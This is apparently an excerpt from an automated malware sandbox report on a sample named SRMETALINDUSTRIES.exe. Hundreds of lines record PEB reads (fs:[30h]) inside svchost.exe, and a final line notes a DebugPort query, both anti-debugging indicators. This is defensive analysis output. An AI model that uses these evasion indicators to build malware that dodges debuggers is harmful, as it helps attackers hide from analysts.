Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03438794 mov eax, dword ptr fs:[00000030h]	9_2_03438794
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034A7794 mov eax, dword ptr fs:[00000030h]	9_2_034A7794
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034A7794 mov eax, dword ptr fs:[00000030h]	9_2_034A7794
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034A7794 mov eax, dword ptr fs:[00000030h]	9_2_034A7794
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03454BAD mov eax, dword ptr fs:[00000030h]	9_2_03454BAD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03454BAD mov eax, dword ptr fs:[00000030h]	9_2_03454BAD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03454BAD mov eax, dword ptr fs:[00000030h]	9_2_03454BAD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034F5BA5 mov eax, dword ptr fs:[00000030h]	9_2_034F5BA5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03429240 mov eax, dword ptr fs:[00000030h]	9_2_03429240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03429240 mov eax, dword ptr fs:[00000030h]	9_2_03429240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03429240 mov eax, dword ptr fs:[00000030h]	9_2_03429240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03429240 mov eax, dword ptr fs:[00000030h]	9_2_03429240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03437E41 mov eax, dword ptr fs:[00000030h]	9_2_03437E41
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03437E41 mov eax, dword ptr fs:[00000030h]	9_2_03437E41
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03437E41 mov eax, dword ptr fs:[00000030h]	9_2_03437E41
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03437E41 mov eax, dword ptr fs:[00000030h]	9_2_03437E41
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03437E41 mov eax, dword ptr fs:[00000030h]	9_2_03437E41
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03437E41 mov eax, dword ptr fs:[00000030h]	9_2_03437E41
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034B4257 mov eax, dword ptr fs:[00000030h]	9_2_034B4257
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034DB260 mov eax, dword ptr fs:[00000030h]	9_2_034DB260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034DB260 mov eax, dword ptr fs:[00000030h]	9_2_034DB260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034F8A62 mov eax, dword ptr fs:[00000030h]	9_2_034F8A62
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0343766D mov eax, dword ptr fs:[00000030h]	9_2_0343766D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0344AE73 mov eax, dword ptr fs:[00000030h]	9_2_0344AE73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0344AE73 mov eax, dword ptr fs:[00000030h]	9_2_0344AE73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0344AE73 mov eax, dword ptr fs:[00000030h]	9_2_0344AE73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0344AE73 mov eax, dword ptr fs:[00000030h]	9_2_0344AE73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0344AE73 mov eax, dword ptr fs:[00000030h]	9_2_0344AE73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0346927A mov eax, dword ptr fs:[00000030h]	9_2_0346927A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0342C600 mov eax, dword ptr fs:[00000030h]	9_2_0342C600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0342C600 mov eax, dword ptr fs:[00000030h]	9_2_0342C600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0342C600 mov eax, dword ptr fs:[00000030h]	9_2_0342C600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03458E00 mov eax, dword ptr fs:[00000030h]	9_2_03458E00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034E1608 mov eax, dword ptr fs:[00000030h]	9_2_034E1608
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03438A0A mov eax, dword ptr fs:[00000030h]	9_2_03438A0A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03425210 mov eax, dword ptr fs:[00000030h]	9_2_03425210
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03425210 mov ecx, dword ptr fs:[00000030h]	9_2_03425210
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03425210 mov eax, dword ptr fs:[00000030h]	9_2_03425210
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03425210 mov eax, dword ptr fs:[00000030h]	9_2_03425210
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0342AA16 mov eax, dword ptr fs:[00000030h]	9_2_0342AA16
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0342AA16 mov eax, dword ptr fs:[00000030h]	9_2_0342AA16
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03443A1C mov eax, dword ptr fs:[00000030h]	9_2_03443A1C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0345A61C mov eax, dword ptr fs:[00000030h]	9_2_0345A61C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0345A61C mov eax, dword ptr fs:[00000030h]	9_2_0345A61C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0342E620 mov eax, dword ptr fs:[00000030h]	9_2_0342E620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03464A2C mov eax, dword ptr fs:[00000030h]	9_2_03464A2C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03464A2C mov eax, dword ptr fs:[00000030h]	9_2_03464A2C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034DFE3F mov eax, dword ptr fs:[00000030h]	9_2_034DFE3F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03468EC7 mov eax, dword ptr fs:[00000030h]	9_2_03468EC7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034536CC mov eax, dword ptr fs:[00000030h]	9_2_034536CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034DFEC0 mov eax, dword ptr fs:[00000030h]	9_2_034DFEC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03452ACB mov eax, dword ptr fs:[00000030h]	9_2_03452ACB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034F8ED6 mov eax, dword ptr fs:[00000030h]	9_2_034F8ED6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034376E2 mov eax, dword ptr fs:[00000030h]	9_2_034376E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03452AE4 mov eax, dword ptr fs:[00000030h]	9_2_03452AE4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034516E0 mov ecx, dword ptr fs:[00000030h]	9_2_034516E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034BFE87 mov eax, dword ptr fs:[00000030h]	9_2_034BFE87
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0345D294 mov eax, dword ptr fs:[00000030h]	9_2_0345D294
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0345D294 mov eax, dword ptr fs:[00000030h]	9_2_0345D294
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034252A5 mov eax, dword ptr fs:[00000030h]	9_2_034252A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034252A5 mov eax, dword ptr fs:[00000030h]	9_2_034252A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034252A5 mov eax, dword ptr fs:[00000030h]	9_2_034252A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034252A5 mov eax, dword ptr fs:[00000030h]	9_2_034252A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034252A5 mov eax, dword ptr fs:[00000030h]	9_2_034252A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034F0EA5 mov eax, dword ptr fs:[00000030h]	9_2_034F0EA5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034F0EA5 mov eax, dword ptr fs:[00000030h]	9_2_034F0EA5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034F0EA5 mov eax, dword ptr fs:[00000030h]	9_2_034F0EA5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034A46A7 mov eax, dword ptr fs:[00000030h]	9_2_034A46A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0343AAB0 mov eax, dword ptr fs:[00000030h]	9_2_0343AAB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0343AAB0 mov eax, dword ptr fs:[00000030h]	9_2_0343AAB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0345FAB0 mov eax, dword ptr fs:[00000030h]	9_2_0345FAB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0344B944 mov eax, dword ptr fs:[00000030h]	9_2_0344B944
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0344B944 mov eax, dword ptr fs:[00000030h]	9_2_0344B944
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03463D43 mov eax, dword ptr fs:[00000030h]	9_2_03463D43
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034A3540 mov eax, dword ptr fs:[00000030h]	9_2_034A3540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03447D50 mov eax, dword ptr fs:[00000030h]	9_2_03447D50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0342C962 mov eax, dword ptr fs:[00000030h]	9_2_0342C962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0342B171 mov eax, dword ptr fs:[00000030h]	9_2_0342B171
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0342B171 mov eax, dword ptr fs:[00000030h]	9_2_0342B171
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0344C577 mov eax, dword ptr fs:[00000030h]	9_2_0344C577
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0344C577 mov eax, dword ptr fs:[00000030h]	9_2_0344C577
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03429100 mov eax, dword ptr fs:[00000030h]	9_2_03429100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03429100 mov eax, dword ptr fs:[00000030h]	9_2_03429100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03429100 mov eax, dword ptr fs:[00000030h]	9_2_03429100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03444120 mov eax, dword ptr fs:[00000030h]	9_2_03444120
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03444120 mov eax, dword ptr fs:[00000030h]	9_2_03444120
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03444120 mov eax, dword ptr fs:[00000030h]	9_2_03444120
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03444120 mov eax, dword ptr fs:[00000030h]	9_2_03444120
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03444120 mov ecx, dword ptr fs:[00000030h]	9_2_03444120
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0342AD30 mov eax, dword ptr fs:[00000030h]	9_2_0342AD30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03433D34 mov eax, dword ptr fs:[00000030h]	9_2_03433D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03433D34 mov eax, dword ptr fs:[00000030h]	9_2_03433D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03433D34 mov eax, dword ptr fs:[00000030h]	9_2_03433D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03433D34 mov eax, dword ptr fs:[00000030h]	9_2_03433D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03433D34 mov eax, dword ptr fs:[00000030h]	9_2_03433D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03433D34 mov eax, dword ptr fs:[00000030h]	9_2_03433D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03433D34 mov eax, dword ptr fs:[00000030h]	9_2_03433D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03433D34 mov eax, dword ptr fs:[00000030h]	9_2_03433D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03433D34 mov eax, dword ptr fs:[00000030h]	9_2_03433D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03433D34 mov eax, dword ptr fs:[00000030h]	9_2_03433D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03433D34 mov eax, dword ptr fs:[00000030h]	9_2_03433D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03433D34 mov eax, dword ptr fs:[00000030h]	9_2_03433D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03433D34 mov eax, dword ptr fs:[00000030h]	9_2_03433D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034F8D34 mov eax, dword ptr fs:[00000030h]	9_2_034F8D34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034AA537 mov eax, dword ptr fs:[00000030h]	9_2_034AA537
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03454D3B mov eax, dword ptr fs:[00000030h]	9_2_03454D3B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03454D3B mov eax, dword ptr fs:[00000030h]	9_2_03454D3B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03454D3B mov eax, dword ptr fs:[00000030h]	9_2_03454D3B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0345513A mov eax, dword ptr fs:[00000030h]	9_2_0345513A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0345513A mov eax, dword ptr fs:[00000030h]	9_2_0345513A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034A6DC9 mov eax, dword ptr fs:[00000030h]	9_2_034A6DC9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034A6DC9 mov eax, dword ptr fs:[00000030h]	9_2_034A6DC9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034A6DC9 mov eax, dword ptr fs:[00000030h]	9_2_034A6DC9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034A6DC9 mov ecx, dword ptr fs:[00000030h]	9_2_034A6DC9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034A6DC9 mov eax, dword ptr fs:[00000030h]	9_2_034A6DC9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034A6DC9 mov eax, dword ptr fs:[00000030h]	9_2_034A6DC9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0342B1E1 mov eax, dword ptr fs:[00000030h]	9_2_0342B1E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0342B1E1 mov eax, dword ptr fs:[00000030h]	9_2_0342B1E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0342B1E1 mov eax, dword ptr fs:[00000030h]	9_2_0342B1E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034B41E8 mov eax, dword ptr fs:[00000030h]	9_2_034B41E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0343D5E0 mov eax, dword ptr fs:[00000030h]	9_2_0343D5E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0343D5E0 mov eax, dword ptr fs:[00000030h]	9_2_0343D5E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034D8DF1 mov eax, dword ptr fs:[00000030h]	9_2_034D8DF1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0345A185 mov eax, dword ptr fs:[00000030h]	9_2_0345A185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03452581 mov eax, dword ptr fs:[00000030h]	9_2_03452581
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03452581 mov eax, dword ptr fs:[00000030h]	9_2_03452581
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03452581 mov eax, dword ptr fs:[00000030h]	9_2_03452581
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03452581 mov eax, dword ptr fs:[00000030h]	9_2_03452581
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0344C182 mov eax, dword ptr fs:[00000030h]	9_2_0344C182
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03422D8A mov eax, dword ptr fs:[00000030h]	9_2_03422D8A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03422D8A mov eax, dword ptr fs:[00000030h]	9_2_03422D8A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03422D8A mov eax, dword ptr fs:[00000030h]	9_2_03422D8A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03422D8A mov eax, dword ptr fs:[00000030h]	9_2_03422D8A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03422D8A mov eax, dword ptr fs:[00000030h]	9_2_03422D8A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03452990 mov eax, dword ptr fs:[00000030h]	9_2_03452990
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0345FD9B mov eax, dword ptr fs:[00000030h]	9_2_0345FD9B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0345FD9B mov eax, dword ptr fs:[00000030h]	9_2_0345FD9B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034F05AC mov eax, dword ptr fs:[00000030h]	9_2_034F05AC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034F05AC mov eax, dword ptr fs:[00000030h]	9_2_034F05AC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034535A1 mov eax, dword ptr fs:[00000030h]	9_2_034535A1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034561A0 mov eax, dword ptr fs:[00000030h]	9_2_034561A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034561A0 mov eax, dword ptr fs:[00000030h]	9_2_034561A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034A69A6 mov eax, dword ptr fs:[00000030h]	9_2_034A69A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03451DB5 mov eax, dword ptr fs:[00000030h]	9_2_03451DB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03451DB5 mov eax, dword ptr fs:[00000030h]	9_2_03451DB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03451DB5 mov eax, dword ptr fs:[00000030h]	9_2_03451DB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034A51BE mov eax, dword ptr fs:[00000030h]	9_2_034A51BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034A51BE mov eax, dword ptr fs:[00000030h]	9_2_034A51BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034A51BE mov eax, dword ptr fs:[00000030h]	9_2_034A51BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034A51BE mov eax, dword ptr fs:[00000030h]	9_2_034A51BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0345A44B mov eax, dword ptr fs:[00000030h]	9_2_0345A44B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03440050 mov eax, dword ptr fs:[00000030h]	9_2_03440050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03440050 mov eax, dword ptr fs:[00000030h]	9_2_03440050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034BC450 mov eax, dword ptr fs:[00000030h]	9_2_034BC450
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034BC450 mov eax, dword ptr fs:[00000030h]	9_2_034BC450
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0344746D mov eax, dword ptr fs:[00000030h]	9_2_0344746D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034F1074 mov eax, dword ptr fs:[00000030h]	9_2_034F1074
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034E2073 mov eax, dword ptr fs:[00000030h]	9_2_034E2073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034A6C0A mov eax, dword ptr fs:[00000030h]	9_2_034A6C0A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034A6C0A mov eax, dword ptr fs:[00000030h]	9_2_034A6C0A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034A6C0A mov eax, dword ptr fs:[00000030h]	9_2_034A6C0A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034A6C0A mov eax, dword ptr fs:[00000030h]	9_2_034A6C0A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034F740D mov eax, dword ptr fs:[00000030h]	9_2_034F740D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034F740D mov eax, dword ptr fs:[00000030h]	9_2_034F740D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034F740D mov eax, dword ptr fs:[00000030h]	9_2_034F740D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034E1C06 mov eax, dword ptr fs:[00000030h]	9_2_034E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034E1C06 mov eax, dword ptr fs:[00000030h]	9_2_034E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034E1C06 mov eax, dword ptr fs:[00000030h]	9_2_034E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034E1C06 mov eax, dword ptr fs:[00000030h]	9_2_034E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034E1C06 mov eax, dword ptr fs:[00000030h]	9_2_034E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034E1C06 mov eax, dword ptr fs:[00000030h]	9_2_034E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034E1C06 mov eax, dword ptr fs:[00000030h]	9_2_034E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034E1C06 mov eax, dword ptr fs:[00000030h]	9_2_034E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034E1C06 mov eax, dword ptr fs:[00000030h]	9_2_034E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034E1C06 mov eax, dword ptr fs:[00000030h]	9_2_034E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034E1C06 mov eax, dword ptr fs:[00000030h]	9_2_034E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034E1C06 mov eax, dword ptr fs:[00000030h]	9_2_034E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034E1C06 mov eax, dword ptr fs:[00000030h]	9_2_034E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034E1C06 mov eax, dword ptr fs:[00000030h]	9_2_034E1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034F4015 mov eax, dword ptr fs:[00000030h]	9_2_034F4015
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034F4015 mov eax, dword ptr fs:[00000030h]	9_2_034F4015
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034A7016 mov eax, dword ptr fs:[00000030h]	9_2_034A7016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034A7016 mov eax, dword ptr fs:[00000030h]	9_2_034A7016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034A7016 mov eax, dword ptr fs:[00000030h]	9_2_034A7016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0345002D mov eax, dword ptr fs:[00000030h]	9_2_0345002D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0345002D mov eax, dword ptr fs:[00000030h]	9_2_0345002D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0345002D mov eax, dword ptr fs:[00000030h]	9_2_0345002D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0345002D mov eax, dword ptr fs:[00000030h]	9_2_0345002D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0345002D mov eax, dword ptr fs:[00000030h]	9_2_0345002D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0343B02A mov eax, dword ptr fs:[00000030h]	9_2_0343B02A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0343B02A mov eax, dword ptr fs:[00000030h]	9_2_0343B02A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0343B02A mov eax, dword ptr fs:[00000030h]	9_2_0343B02A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0343B02A mov eax, dword ptr fs:[00000030h]	9_2_0343B02A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0345BC2C mov eax, dword ptr fs:[00000030h]	9_2_0345BC2C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034F8CD6 mov eax, dword ptr fs:[00000030h]	9_2_034F8CD6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034BB8D0 mov eax, dword ptr fs:[00000030h]	9_2_034BB8D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034BB8D0 mov ecx, dword ptr fs:[00000030h]	9_2_034BB8D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034BB8D0 mov eax, dword ptr fs:[00000030h]	9_2_034BB8D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034BB8D0 mov eax, dword ptr fs:[00000030h]	9_2_034BB8D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034BB8D0 mov eax, dword ptr fs:[00000030h]	9_2_034BB8D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034BB8D0 mov eax, dword ptr fs:[00000030h]	9_2_034BB8D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034258EC mov eax, dword ptr fs:[00000030h]	9_2_034258EC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034E14FB mov eax, dword ptr fs:[00000030h]	9_2_034E14FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034A6CF0 mov eax, dword ptr fs:[00000030h]	9_2_034A6CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034A6CF0 mov eax, dword ptr fs:[00000030h]	9_2_034A6CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034A6CF0 mov eax, dword ptr fs:[00000030h]	9_2_034A6CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03429080 mov eax, dword ptr fs:[00000030h]	9_2_03429080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034A3884 mov eax, dword ptr fs:[00000030h]	9_2_034A3884
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034A3884 mov eax, dword ptr fs:[00000030h]	9_2_034A3884
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0343849B mov eax, dword ptr fs:[00000030h]	9_2_0343849B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034520A0 mov eax, dword ptr fs:[00000030h]	9_2_034520A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034520A0 mov eax, dword ptr fs:[00000030h]	9_2_034520A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034520A0 mov eax, dword ptr fs:[00000030h]	9_2_034520A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034520A0 mov eax, dword ptr fs:[00000030h]	9_2_034520A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034520A0 mov eax, dword ptr fs:[00000030h]	9_2_034520A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034520A0 mov eax, dword ptr fs:[00000030h]	9_2_034520A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034690AF mov eax, dword ptr fs:[00000030h]	9_2_034690AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0345F0BF mov ecx, dword ptr fs:[00000030h]	9_2_0345F0BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0345F0BF mov eax, dword ptr fs:[00000030h]	9_2_0345F0BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0345F0BF mov eax, dword ptr fs:[00000030h]	9_2_0345F0BF

Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Process queried: DebugPort			Jump to behavior
